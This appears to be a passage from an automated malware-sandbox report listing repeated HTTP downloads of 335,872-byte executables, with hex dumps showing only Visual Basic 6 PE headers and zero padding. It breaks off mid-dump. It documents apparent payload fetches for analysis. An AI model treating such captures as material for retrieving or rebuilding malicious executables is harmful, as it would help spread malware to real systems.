          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Thu, 29 Sep 2022 12:47:41 GMTContent-Type: application/octet-streamContent-Length: 335872Last-Modified: Mon, 23 May 2022 22:06:20 GMTConnection: keep-aliveETag: "628c055c-52000"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 b7 12 07 db f3 73 69 88 f3 73 69 88 f3 73 69 88 1a 6c 64 88 f2 73 69 88 52 69 63 68 f3 73 69 88 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 6c ce e8 42 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 20 03 00 00 10 02 00 00 00 00 00 0c 11 00 00 00 10 00 00 00 30 03 00 00 00 40 00 00 10 00 00 00 10 00 00 04 00 00 00 01 00 03 00 04 00 00 00 00 00 00 00 00 40 05 00 00 10 00 00 b8 7d 05 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 d4 22 03 00 28 00 00 00 00 50 03 00 74 e2 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 28 02 00 00 20 00 00 00 00 10 00 00 6c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 08 14 03 00 00 10 00 00 00 20 03 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 48 1b 00 00 00 30 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 74 e2 01 00 00 50 03 00 00 f0 01 00 00 30 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 60 1d f3 3e 10 00 00 00 00 00 00 00 00 00 00 00 4d 53 56 42 56 4d 36 30 2e 44 4c 4c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Thu, 29 Sep 2022 12:47:53 GMTContent-Type: application/octet-streamContent-Length: 335872Last-Modified: Mon, 23 May 2022 22:29:54 GMTConnection: keep-aliveETag: "628c0ae2-52000"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 b7 12 07 db f3 73 69 88 f3 73 69 88 f3 73 69 88 1a 6c 64 88 f2 73 69 88 52 69 63 68 f3 73 69 88 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 6c ce e8 42 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 20 03 00 00 10 02 00 00 00 00 00 0c 11 00 00 00 10 00 00 00 30 03 00 00 00 40 00 00 10 00 00 00 10 00 00 04 00 00 00 01 00 03 00 04 00 00 00 00 00 00 00 00 40 05 00 00 10 00 00 b8 7d 05 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 d4 22 03 00 28 00 00 00 00 50 03 00 74 e2 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 28 02 00 00 20 00 00 00 00 10 00 00 6c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 08 14 03 00 00 10 00 00 00 20 03 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 48 1b 00 00 00 30 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 74 e2 01 00 00 50 03 00 00 f0 01 00 00 30 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 60 1d f3 3e 10 00 00 00 00 00 00 00 00 00 00 00 4d 53 56 42 56 4d 36 30 2e 44 4c 4c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Thu, 29 Sep 2022 12:47:53 GMTContent-Type: application/octet-streamContent-Length: 335872Last-Modified: Wed, 18 May 2022 22:16:07 GMTConnection: keep-aliveETag: "62857027-52000"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 b7 12 07 db f3 73 69 88 f3 73 69 88 f3 73 69 88 1a 6c 64 88 f2 73 69 88 52 69 63 68 f3 73 69 88 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 6c ce e8 42 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 20 03 00 00 10 02 00 00 00 00 00 0c 11 00 00 00 10 00 00 00 30 03 00 00 00 40 00 00 10 00 00 00 10 00 00 04 00 00 00 01 00 03 00 04 00 00 00 00 00 00 00 00 40 05 00 00 10 00 00 b8 7d 05 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 d4 22 03 00 28 00 00 00 00 50 03 00 74 e2 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 28 02 00 00 20 00 00 00 00 10 00 00 6c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 08 14 03 00 00 10 00 00 00 20 03 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 48 1b 00 00 00 30 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 74 e2 01 00 00 50 03 00 00 f0 01 00 00 30 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 60 1d f3 3e 10 00 00 00 00 00 00 00 00 00 00 00 4d 53 56 42 56 4d 36 30 2e 44 4c 4c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Thu, 29 Sep 2022 12:47:58 GMTContent-Type: application/octet-streamContent-Length: 335872Last-Modified: Mon, 23 May 2022 22:06:20 GMTConnection: keep-aliveETag: "628c055c-52000"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 b7 12 07 db f3 73 69 88 f3 73 69 88 f3 73 69 88 1a 6c 64 88 f2 73 69 88 52 69 63 68 f3 73 69 88 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 6c ce e8 42 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 20 03 00 00 10 02 00 00 00 00 00 0c 11 00 00 00 10 00 00 00 30 03 00 00 00 40 00 00 10 00 00 00 10 00 00 04 00 00 00 01 00 03 00 04 00 00 00 00 00 00 00 00 40 05 00 00 10 00 00 b8 7d 05 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 d4 22 03 00 28 00 00 00 00 50 03 00 74 e2 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 28 02 00 00 20 00 00 00 00 10 00 00 6c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 08 14 03 00 00 10 00 00 00 20 03 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 48 1b 00 00 00 30 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 74 e2 01 00 00 50 03 00 00 f0 01 00 00 30 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 60 1d f3 3e 10 00 00 00 00 00 00 00 00 00 00 00 4d 53 56 42 56 4d 36 30 2e 44 4c 4c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Thu, 29 Sep 2022 12:48:02 GMTContent-Type: application/octet-streamContent-Length: 335872Last-Modified: Mon, 23 May 2022 22:29:54 GMTConnection: keep-aliveETag: "628c0ae2-52000"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 b7 12 07 db f3 73 69 88 f3 73 69 88 f3 73 69 88 1a 6c 64 88 f2 73 69 88 52 69 63 68 f3 73 69 88 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 6c ce e8 42 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 20 03 00 00 10 02 00 00 00 00 00 0c 11 00 00 00 10 00 00 00 30 03 00 00 00 40 00 00 10 00 00 00 10 00 00 04 00 00 00 01 00 03 00 04 00 00 00 00 00 00 00 00 40 05 00 00 10 00 00 b8 7d 05 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 d4 22 03 00 28 00 00 00 00 50 03 00 74 e2 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 28 02 00 00 20 00 00 00 00 10 00 00 6c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 08 14 03 00 00 10 00 00 00 20 03 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 48 1b 00 00 00 30 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 74 e2 01 00 00 50 03 00 00 f0 01 00 00 30 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 60 1d f3 3e 10 00 00 00 00 00 00 00 00 00 00 00 4d 53 56 42 56 4d 36 30 2e 44 4c 4c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Thu, 29 Sep 2022 12:48:03 GMTContent-Type: application/octet-streamContent-Length: 335872Last-Modified: Wed, 18 May 2022 22:16:07 GMTConnection: keep-aliveETag: "62857027-52000"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 b7 12 07 db f3 73 69 88 f3 73 69 88 f3 73 69 88 1a 6c 64 88 f2 73 69 88 52 69 63 68 f3 73 69 88 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 6c ce e8 42 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 20 03 00 00 10 02 00 00 00 00 00 0c 11 00 00 00 10 00 00 00 30 03 00 00 00 40 00 00 10 00 00 00 10 00 00 04 00 00 00 01 00 03 00 04 00 00 00 00 00 00 00 00 40 05 00 00 10 00 00 b8 7d 05 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 d4 22 03 00 28 00 00 00 00 50 03 00 74 e2 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 28 02 00 00 20 00 00 00 00 10 00 00 6c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 08 14 03 00 00 10 00 00 00 20 03 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 48 1b 00 00 00 30 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 74 e2 01 00 00 50 03 00 00 f0 01 00 00 30 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 60 1d f3 3e 10 00 00 00 00 00 00 00 00 00 00 00 4d 53 56 42 56 4d 36 30 2e 44 4c 4c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Thu, 29 Sep 2022 12:48:06 GMTContent-Type: application/octet-streamContent-Length: 335872Last-Modified: Mon, 23 May 2022 22:06:20 GMTConnection: keep-aliveETag: "628c055c-52000"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 b7 12 07 db f3 73 69 88 f3 73 69 88 f3 73 69 88 1a 6c 64 88 f2 73 69 88 52 69 63 68 f3 73 69 88 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 6c ce e8 42 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 20 03 00 00 10 02 00 00 00 00 00 0c 11 00 00 00 10 00 00 00 30 03 00 00 00 40 00 00 10 00 00 00 10 00 00 04 00 00 00 01 00 03 00 04 00 00 00 00 00 00 00 00 40 05 00 00 10 00 00 b8 7d 05 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 d4 22 03 00 28 00 00 00 00 50 03 00 74 e2 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 28 02 00 00 20 00 00 00 00 10 00 00 6c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 08 14 03 00 00 10 00 00 00 20 03 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 48 1b 00 00 00 30 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 74 e2 01 00 00 50 03 00 00 f0 01 00 00 30 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 60 1d f3 3e 10 00 00 00 00 00 00 00 00 00 00 00 4d 53 56 42 56 4d 36 30 2e 44 4c 4c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Thu, 29 Sep 2022 12:48:09 GMTContent-Type: application/octet-streamContent-Length: 335872Last-Modified: Mon, 23 May 2022 22:29:54 GMTConnection: keep-aliveETag: "628c0ae2-52000"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 b7 12 07 db f3 73 69 88 f3 73 69 88 f3 73 69 88 1a 6c 64 88 f2 73 69 88 52 69 63 68 f3 73 69 88 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 6c ce e8 42 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 20 03 00 00 10 02 00 00 00 00 00 0c 11 00 00 00 10 00 00 00 30 03 00 00 00 40 00 00 10 00 00 00 10 00 00 04 00 00 00 01 00 03 00 04 00 00 00 00 00 00 00 00 